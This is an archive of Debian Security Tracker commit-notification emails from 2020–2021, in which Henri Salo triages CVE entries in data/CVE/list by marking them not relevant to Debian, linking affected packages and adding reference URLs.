 CVE-2021-24385 (The Filebird Plugin 4.7.3 introduced a SQL injection 
vulnerability as  ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24384 (The joomsport_md_load AJAX action of the JoomSport WordPress 
plugin be ...)
NOT-FOR-US: Wordpress plugin
 CVE-2021-24383 (The WP Google Maps WordPress plugin before 8.1.12 did not 
sanitise, va ...)
@@ -29404,7 +29404,7 @@ CVE-2021-24367 (The WP Config File Editor WordPress 
plugin through 1.7.1 was aff
 CVE-2021-24366 (The Admin Columns Free WordPress plugin before 4.3 and Admin 
Columns P ...)
NOT-FOR-US: WordPress plugin
 CVE-2021-24365 (The Admin Columns WordPress plugin Free before 4.3.2 and Pro 
before 5. ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin
 CVE-2021-24364 (The Jannah WordPress theme before 5.4.4 did not properly 
sanitize the  ...)
NOT-FOR-US: WordPress theme
 CVE-2021-24363



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/2f28e8686d632fbac264fcc38e2d5c161dd70e69

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/2f28e8686d632fbac264fcc38e2d5c161dd70e69
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
83641477 by Henri Salo at 2021-07-13T21:03:49+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -34757,6 +34757,7 @@ CVE-2021-22001
RESERVED
 CVE-2021-22000
RESERVED
+   NOT-FOR-US: VMware
 CVE-2021-21999 (VMware Tools for Windows (11.x.y prior to 11.2.6), VMware 
Remote Conso ...)
NOT-FOR-US: VMware
 CVE-2021-21998 (VMware Carbon Black App Control 8.0, 8.1, 8.5 prior to 8.5.8, 
and 8.6  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/836414771cd691a49426ebbdb2b5e93d4578642f

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/836414771cd691a49426ebbdb2b5e93d4578642f
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d936dc25 by Henri Salo at 2021-07-13T21:03:09+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -34767,8 +34767,10 @@ CVE-2021-21996
RESERVED
 CVE-2021-21995
RESERVED
+   NOT-FOR-US: VMware
 CVE-2021-21994
RESERVED
+   NOT-FOR-US: VMware
 CVE-2021-21993
RESERVED
 CVE-2021-21992



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d936dc25c1c5ad895311ef2e3e534f8058afe886

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d936dc25c1c5ad895311ef2e3e534f8058afe886
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-36373, CVE-2021-36374/ant

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
0d55e220 by Henri Salo at 2021-07-13T21:01:56+03:00
CVE-2021-36373, CVE-2021-36374/ant

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -726,8 +726,12 @@ CVE-2021-36375
RESERVED
 CVE-2021-36374
RESERVED
+   - ant 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/6
 CVE-2021-36373
RESERVED
+   - ant 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/5
 CVE-2021-36372
RESERVED
 CVE-2021-36371 (Emissary-Ingress (formerly Ambassador API Gateway) through 
1.13.9 allo ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/0d55e2203fd8a4810ddcf8c5da5881164f76cfc3

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/0d55e2203fd8a4810ddcf8c5da5881164f76cfc3
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090

2021-07-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8015d59e by Henri Salo at 2021-07-13T10:46:51+03:00
CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1310,6 +1310,8 @@ CVE-2021-3632
NOT-FOR-US: Keycloak
 CVE-2021-36090
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/4
 CVE-2020-36416 (A stored cross scripting (XSS) vulnerability in CMS Made 
Simple 2.2.14 ...)
NOT-FOR-US: CMS Made Simple
 CVE-2020-36415 (A stored cross scripting (XSS) vulnerability in CMS Made 
Simple 2.2.14 ...)
@@ -2640,10 +2642,16 @@ CVE-2021-35518
RESERVED
 CVE-2021-35517
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/3
 CVE-2021-35516
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/2
 CVE-2021-35515
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/1
 CVE-2021-35514 (Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection 
via the t ...)
NOT-FOR-US: Narou
 CVE-2021-35513 (Mermaid before 8.11.0 allows XSS when the antiscript feature 
is used. ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8015d59e114d9e9e59677fa98c3dddfe65b00ed2

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8015d59e114d9e9e59677fa98c3dddfe65b00ed2
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-26920/druid

2021-07-01 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
36eba64a by Henri Salo at 2021-07-02T08:59:34+03:00
CVE-2021-26920/druid

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -21685,6 +21685,7 @@ CVE-2021-26921 (In util/session/sessionmanager.go in 
Argo CD before 1.8.4, token
NOT-FOR-US: Argo CD
 CVE-2021-26920
RESERVED
+   - druid  (bug #825797)
 CVE-2021-26919 (Apache Druid allows users to read data from other database 
systems usi ...)
- druid  (bug #825797)
 CVE-2021-26918 (** DISPUTED ** The ProBot bot through 2021-02-08 for Discord 
might all ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/36eba64ae238fb4e7cf15389a424a20f053d8b9d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/36eba64ae238fb4e7cf15389a424a20f053d8b9d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-06-15 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
e8ca41e5 by Henri Salo at 2021-06-16T08:04:48+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -91495,6 +91495,7 @@ CVE-2020-9494 (Apache Traffic Server 6.0.0 to 6.2.3, 
7.0.0 to 7.1.10, and 8.0.0
NOTE: https://github.com/apache/trafficserver/pull/6922
 CVE-2020-9493
RESERVED
+   NOT-FOR-US: Apache Chainsaw
 CVE-2020-9492 (In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 
2.0.0-alph ...)
- hadoop  (bug #793644)
 CVE-2020-9491 (In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were 
protected by  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/e8ca41e56c93d2f1110379460e1f1e04714e26c8

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/e8ca41e56c93d2f1110379460e1f1e04714e26c8
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-05-29 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
a86f424b by Henri Salo at 2021-05-29T10:28:03+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -235,7 +235,7 @@ CVE-2021-33625
 CVE-2021-33624
RESERVED
 CVE-2021-33623 (The trim-newlines package before 3.0.1 and 4.x before 4.0.1 
for Node.j ...)
-   TODO: check
+   NOT-FOR-US: Node.js trim-newlines package
 CVE-2021-33622
RESERVED
 CVE-2021-33621



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a86f424bfcd78ba832ac7e2795ce3e41dbd1245d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a86f424bfcd78ba832ac7e2795ce3e41dbd1245d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-05-04 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
4509e67f by Henri Salo at 2021-05-05T07:55:27+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3087,6 +3087,10 @@ CVE-2021-30640
RESERVED
 CVE-2021-30639
RESERVED
+CVE-2020-36334
+   NOT-FOR-US: WordPress plugin themegrill-demo-importer
+CVE-2020-36333
+   NOT-FOR-US: WordPress plugin themegrill-demo-importer
 CVE-2020-36321 (Improper URL validation in development mode handler in 
com.vaadin:flow ...)
NOT-FOR-US: Vaadin
 CVE-2020-36320 (Unsafe validation RegEx in EmailValidator class in 
com.vaadin:vaadin-s ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4509e67f7937e10079be4f1fe0452814dda02dae

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4509e67f7937e10079be4f1fe0452814dda02dae
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Reverting commit as there was following error: 299286: error: bug name...

2021-04-07 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
09067bdc by Henri Salo at 2021-04-07T23:09:18+03:00
Reverting commit as there was following error: 299286: error: bug name 
TEMP-000-D41D8C is not unique

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,6 +1,3 @@
-CVE-2021-
-   - mediawiki 
-   NOTE: 
https://lists.wikimedia.org/pipermail/mediawiki-announce/2021-April/000271.html
 CVE-2021-3484
RESERVED
 CVE-2021-3483



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/09067bdc29f8ed3be1da1baf50654b79fa5bea98

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/09067bdc29f8ed3be1da1baf50654b79fa5bea98
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] MediaWiki security pre-release announcement: 1.31.13 / 1.35.2

2021-04-07 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
4f5b2fdf by Henri Salo at 2021-04-07T23:04:12+03:00
MediaWiki security pre-release announcement: 1.31.13 / 1.35.2

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,3 +1,6 @@
+CVE-2021-
+   - mediawiki 
+   NOTE: 
https://lists.wikimedia.org/pipermail/mediawiki-announce/2021-April/000271.html
 CVE-2021-3484
RESERVED
 CVE-2021-3483



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4f5b2fdf5a90966326eeae5a7fb5793764e40dbb

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4f5b2fdf5a90966326eeae5a7fb5793764e40dbb
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2021-28918

2021-03-31 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b7acc4f6 by Henri Salo at 2021-03-31T18:41:50+03:00
CVE-2021-28918

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1610,6 +1610,9 @@ CVE-2021-28919
RESERVED
 CVE-2021-28918
RESERVED
+   TODO: check
+   NOTE: https://sick.codes/sick-2021-011
+   NOTE: 
https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/
 CVE-2021-28917
RESERVED
 CVE-2021-28916



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b7acc4f643dd39e3e1e866da3fcdd6368fab88ac

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b7acc4f643dd39e3e1e866da3fcdd6368fab88ac
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2021-02-28 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
c9097fb9 by Henri Salo at 2021-02-28T17:32:07+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -14236,7 +14236,7 @@ CVE-2020-36081
 CVE-2020-36080
RESERVED
 CVE-2020-36079 (Zenphoto through 1.5.7 is affected by authenticated arbitrary 
file upl ...)
-   TODO: check
+   NOT-FOR-US: Zenphoto
 CVE-2020-36078
RESERVED
 CVE-2020-36077



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/c9097fb9fed587bccd06b8b45013fe84f9d346a8

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/c9097fb9fed587bccd06b8b45013fe84f9d346a8
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-12-17 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
cf285a75 by Henri Salo at 2020-12-17T10:38:20+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -40872,6 +40872,7 @@ CVE-2020-13932 (In Apache ActiveMQ Artemis 2.5.0 to 
2.13.0, a specially crafted
NOTE: 
https://activemq.apache.org/security-advisories.data/CVE-2020-13932-announcement.txt
 CVE-2020-13931
RESERVED
+   NOT-FOR-US: Apache TomEE
 CVE-2020-13930
RESERVED
 CVE-2020-13929



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/cf285a75f0782d879dd6f8536de65e53fed7c177

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/cf285a75f0782d879dd6f8536de65e53fed7c177
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-12-14 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
03ad41ce by Henri Salo at 2020-12-14T10:19:35+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -11,9 +11,9 @@ CVE-2020-35237
 CVE-2020-35236 (The GitLab Webhook Handler in amazee.io Lagoon before 1.12.3 
has incor ...)
TODO: check
 CVE-2020-35235 (** UNSUPPORTED WHEN ASSIGNED ** 
vendor/elfinder/php/connector.minimal. ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin secure-file-manager
 CVE-2020-35234 (The easy-wp-smtp plugin before 1.4.4 for WordPress allows 
Administrato ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin easy-wp-smtp
 CVE-2020-35233
RESERVED
 CVE-2020-35232



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/03ad41ce1b01cf2afb709e40c2aecf97f9b61af1

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/03ad41ce1b01cf2afb709e40c2aecf97f9b61af1
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

Bug#913482: moreinfo

2020-12-06 Thread Henri Salo

Can't reproduce. Is this still valid finding with current versions? Any more
information available?

-- 
Henri Salo

[Git][security-tracker-team/security-tracker][master] CVE-2020-17521

2020-12-06 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
63e150ff by Henri Salo at 2020-12-06T11:46:22+02:00
CVE-2020-17521

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -29094,6 +29094,8 @@ CVE-2020-17522
RESERVED
 CVE-2020-17521
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2020/12/06/1
 CVE-2020-17520
RESERVED
 CVE-2020-17519



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/63e150ff30b26d9f5e411798e1055382f85a3a3f

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/63e150ff30b26d9f5e411798e1055382f85a3a3f
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

Bug#965339: Is upstream notified?

2020-11-15 Thread Henri Salo

On Sun, Nov 15, 2020 at 10:19:08AM +0100, Andreas Ronnquist wrote:
> There is talk about a new upstream release, so I am holding packaging a
> new git snapshot a while, waiting for upstream.

Thank you :)

Bug#965339: Is upstream notified?

2020-11-14 Thread Henri Salo

What is the upstream issue ID?

-- 
Henri Salo

[Git][security-tracker-team/security-tracker][master] CVE-2020-13958

2020-11-10 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
4d035971 by Henri Salo at 2020-11-11T08:42:52+02:00
CVE-2020-13958

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -33540,6 +33540,9 @@ CVE-2020-13959
RESERVED
 CVE-2020-13958
RESERVED
+   - libreoffice 
+   NOTE: https://www.openoffice.org/security/cves/CVE-2020-13958.html
+   TODO: check
 CVE-2020-13957 (Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 
to 8.6.2 ...)
- lucene-solr  (Vulnerable functionality not yet present)
 CVE-2020-13956 [incorrect handling of malformed authority component in request 
URIs]



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4d035971f580ac00afa463c77228ebc4dc68c763

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4d035971f580ac00afa463c77228ebc4dc68c763
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-10-21 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
ded415b5 by Henri Salo at 2020-10-21T09:38:16+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -143735,6 +143735,7 @@ CVE-2018-11765 (In Apache Hadoop versions 
3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2,
- hadoop  (bug #793644)
 CVE-2018-11764
RESERVED
+   - hadoop  (bug #793644)
 CVE-2018-11763 (In Apache HTTP Server 2.4.17 to 2.4.34, by sending continuous, 
large S ...)
- apache2 2.4.35-1 (bug #909591)
[stretch] - apache2 2.4.25-3+deb9u6



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/ded415b5193414c4639ebf6cbff9d4bae962bb92

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/ded415b5193414c4639ebf6cbff9d4bae962bb92
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-07-14 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6b151b38 by Henri Salo at 2020-07-14T11:51:02+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -4312,8 +4312,10 @@ CVE-2020-13927
RESERVED
 CVE-2020-13926
RESERVED
+   NOT-FOR-US: Apache Kylin
 CVE-2020-13925
RESERVED
+   NOT-FOR-US: Apache Kylin
 CVE-2020-13924
RESERVED
 CVE-2020-13923



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6b151b3876046ea7924e3b123cddead3ef2d1b20

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6b151b3876046ea7924e3b123cddead3ef2d1b20
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Fix typo

2020-07-03 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
fbdda2b5 by Henri Salo at 2020-07-03T13:58:55+03:00
Fix typo

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3171,25 +3171,25 @@ CVE-2020-14175
 CVE-2020-14174
RESERVED
 CVE-2020-14173 (The file upload feature in Atlassian Jira Server and Data 
Center in af ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14172 (Affected versions of Atlassian Jira Server and Data Center 
allow remot ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14171
RESERVED
 CVE-2020-14170
RESERVED
 CVE-2020-14169 (The quick search component in Atlassian Jira Server and Data 
Center be ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14168 (The email client in Jira Server and Data Center before version 
7.13.16 ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14167 (The MessageBundleResource resource in Jira Server and Data 
Center befo ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14166 (The /servicedesk/customer/portals resource in Jira Service 
Desk Server ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14165 (The UniversalAvatarResource.getAvatars resource in Jira Server 
and Dat ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14164 (The WYSIWYG editor resource in Jira Server and Data Center 
before vers ...)
-   NOT-FOR-US: Atlasstian
+   NOT-FOR-US: Atlassian
 CVE-2020-14163 (An issue was discovered in 
ecma/operations/ecma-container-object.c in  ...)
NOT-FOR-US: JerryScript
 CVE-2020-14162



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/fbdda2b5b590f1fe0b11de342503cb95f8fb27d0

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/fbdda2b5b590f1fe0b11de342503cb95f8fb27d0
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-05-11 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
132d700b by Henri Salo at 2020-05-12T08:36:58+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -28381,6 +28381,7 @@ CVE-2020-1940 (The optional initial password change and 
password expiration feat
NOT-FOR-US: Apache Jackrabbit Oak
 CVE-2020-1939
RESERVED
+   NOT-FOR-US: Apache NuttX
 CVE-2020-1938 (When using the Apache JServ Protocol (AJP), care must be taken 
when tr ...)
{DSA-4680-1 DSA-4673-1 DLA-2209-1 DLA-2133-1}
- tomcat9 9.0.31-1 (bug #952437)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/132d700b3126899badf4fa2219450b7eec199a28

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/132d700b3126899badf4fa2219450b7eec199a28
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-04-16 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d1a2fa0a by Henri Salo at 2020-04-16T09:29:31+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -24902,6 +24902,7 @@ CVE-2019-19518 (CA Automic Sysload 5.6.0 through 6.1.2 
contains a vulnerability,
NOT-FOR-US: CA Automic Sysload
 CVE-2020-1964
RESERVED
+   NOT-FOR-US: Apache Heron
 CVE-2020-1963
RESERVED
 CVE-2020-1962



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d1a2fa0ac23ea04c6c67d395cbbc79d600d7f1bf

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d1a2fa0ac23ea04c6c67d395cbbc79d600d7f1bf
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2020-02-23 Thread Henri Salo



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d7246ebf by Henri Salo at 2020-02-23T10:39:38+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -18098,6 +18098,7 @@ CVE-2020-1938
RESERVED
 CVE-2020-1937
RESERVED
+   NOT-FOR-US: Apache Kylin
 CVE-2020-1936
RESERVED
 CVE-2020-1935



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/d7246ebfd8c32f303f846538bca9a18a57bc4bdc

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/commit/d7246ebfd8c32f303f846538bca9a18a57bc4bdc
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

